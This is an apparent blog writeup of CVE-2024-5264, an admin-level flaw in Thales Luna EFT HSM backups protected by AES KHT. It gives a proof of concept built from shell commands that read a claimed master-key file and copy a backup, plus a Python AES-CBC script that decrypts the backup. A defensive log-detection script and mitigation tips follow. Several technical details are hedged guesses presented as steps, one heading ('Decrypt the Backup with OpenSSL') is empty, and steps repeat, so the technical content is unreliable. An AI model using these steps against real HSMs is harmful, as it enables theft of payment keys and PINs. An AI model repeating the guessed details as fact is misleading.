CVE-2024-5264 is a newly disclosed vulnerability affecting the Thales Luna EFT hardware security module (HSM) series, starting with version 2.1. The weakness lies in the way the system handles network backup transfers protected by AES Key Handling Tokens (AES KHT). In simple terms: if someone with administrator access gets hold of the backup data, they can decrypt it offline and recover sensitive keys and secrets.

In this long read, we'll break down how this vulnerability works, show code snippets that a potential attacker might use, and give you guidance on how to protect your systems.

What Is Thales Luna EFT?

Thales Luna EFT (Electronic Funds Transfer) is an HSM used by banks and payment processors to secure cryptographic keys and transactions. The HSM keeps private keys safe, handles PIN processing, and helps with compliance.

What Is AES KHT Protection?

To protect backups, Luna EFT uses “AES Key Handling Tokens” – basically a mechanism to wrap (encrypt) backup files using AES encryption. This should prevent someone from stealing a backup and decrypting it. However, this protection is only as strong as *how the keys are handled and where they're stored*.

The Vulnerability (CVE-2024-5264) – What Happened?

In Luna EFT versions 2.1 and above, the process for transferring and protecting backup files over the network using AES KHT has a fatal flaw:

- The AES KHT master keys are stored in a way that *anyone with administrator console access* can retrieve them.
- With these keys, an attacker with admin console access can download the backup files, decrypt them offline, and recover *all* protected secrets – including PINs, cryptographic keys, and anything else the backup protects.

Prerequisites

1. Admin Console Access: The attacker needs at least administrator-level permission on the Luna EFT console.

Locate and Download the AES KHT Master Key

On the HSM file system, the AES KHT master key is often kept in the /etc/luna/kht_master.key file (path may vary). With admin rights:

```bash
# cat /etc/luna/kht_master.key > ~/kht_master.key
```

```bash
# Copy an exported backup file (example file name as given in this writeup)
cp /var/backups/hsm_backup_20240613.bk ~/backup.bk
```

Decrypt the Backup with OpenSSL

Suppose the backup uses AES-256-CBC; with the key and IV from kht_master.key (possibly in hex form):

Proof of Concept (PoC)

The following Bash/Python PoC demonstrates the offline decryption of a backup if you have the KHT master key:

```bash
# Extract the AES KHT master key (requires admin rights)
cat /etc/luna/kht_master.key > kht.key

# Export a backup from the admin console (e.g., backup.bk)
cp /path/to/hsm_backup.bk backup.bk
```

```python
# Requires the pycryptodome package (provides Crypto.Cipher)
from Crypto.Cipher import AES
from binascii import unhexlify

# Load key and IV (replace with the actual hex values from the kht.key file)
key = unhexlify('00112233445566778899aabbccddeeff00112233445566778899aabbccddeeff')
iv = unhexlify('aabbccddeeff00998877665544332211')

with open('backup.bk', 'rb') as fin:
    data = fin.read()

# Decrypt the backup (AES-256-CBC, as assumed above)
cipher = AES.new(key, AES.MODE_CBC, iv)
decrypted = cipher.decrypt(data)

with open('decrypted_backup.tar', 'wb') as fout:
    fout.write(decrypted)
```

Why Is This Serious?

This means any employee with access to the Luna EFT administrator's console, or anyone who gets credentials by phishing or otherwise, can secretly download and decrypt complete HSM backups – stealing cryptographic keys, PINs, or cardholder data, and effectively bypassing ALL security the HSM should provide.

Mitigation

- Rotate KHT master keys and re-encrypt all backups after any potential compromise.
- Monitor for backup/restore operations in system logs.
- Upgrade to patched firmware if/when available (check vendor advisories).
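The monitoring recommendation above, worked through as an added example (not code from the writeup or from Thales): a small detector that flags reads of the KHT master key file and correlates them with backup export/transfer events by the same user. The audit-log format, the `backupsvc` service account, and the 30-minute correlation window are assumptions; the sample lines are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample audit lines in a hypothetical key=value format; the real
# Luna EFT log format is not shown in the writeup, so adapt LINE_RE to yours.
SAMPLE_LOG = """\
2024-06-13T01:00:02Z audit user=backupsvc action=backup.export file=/var/backups/hsm_backup_20240613.bk
2024-06-13T01:00:05Z audit user=backupsvc action=backup.transfer dest=10.0.0.5
2024-06-13T14:22:41Z audit user=jdoe action=file.read path=/etc/luna/kht_master.key
2024-06-13T14:23:10Z audit user=jdoe action=backup.export file=/var/backups/hsm_backup_20240613.bk
2024-06-13T14:25:00Z audit user=jdoe action=backup.transfer dest=203.0.113.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) audit (?P<kv>.*)$")
KHT_KEY_PATH = "/etc/luna/kht_master.key"   # path named in the writeup
BACKUP_ACCOUNTS = {"backupsvc"}             # assumed approved backup identity
WINDOW = timedelta(minutes=30)              # assumed correlation window

def parse(line):
    """Parse one audit line into a dict of fields, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = dict(kv.split("=", 1) for kv in m.group("kv").split())
    fields["ts"] = datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ")
    return fields

def detect(log_text):
    """Return (severity, user, reason) tuples for suspicious backup activity."""
    events = [e for e in (parse(ln) for ln in log_text.splitlines()) if e]
    alerts = []
    key_reads = {}  # user -> timestamp of the most recent master-key read
    for e in events:
        user, action = e.get("user"), e.get("action")
        if action == "file.read" and e.get("path") == KHT_KEY_PATH:
            key_reads[user] = e["ts"]
            alerts.append(("high", user, "read of AES KHT master key"))
        elif action in ("backup.export", "backup.transfer"):
            if user not in BACKUP_ACCOUNTS:
                alerts.append(("medium", user, f"{action} by non-backup account"))
            # Master-key read followed by a backup leaving the HSM: offline
            # decryption of that backup is now possible, so escalate.
            if user in key_reads and e["ts"] - key_reads[user] <= WINDOW:
                alerts.append(("critical", user, f"{action} shortly after master-key read"))
    return alerts

if __name__ == "__main__":
    for severity, user, reason in detect(SAMPLE_LOG):
        print(f"[{severity}] {user}: {reason}")
```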

Conclusion

CVE-2024-5264 is a critical security issue that puts the entire cryptographic boundary of Luna EFT at risk if an attacker has enough access. It highlights (again) that *everything relies on controlling your administrators* – if they can touch secrets, the whole chain of trust can snap. Be sure to review your access controls and backup encryption practices on any HSM deployment.

Stay safe, audit often, and patch as soon as a hotfix is live.


*This writeup is exclusive and for educational purposes only. For questions, reach out to your vendor or review the latest NIST security bulletins.*

Timeline

Published on: 05/23/2024 09:15:10 UTC
Last modified on: 06/21/2024 17:18:00 UTC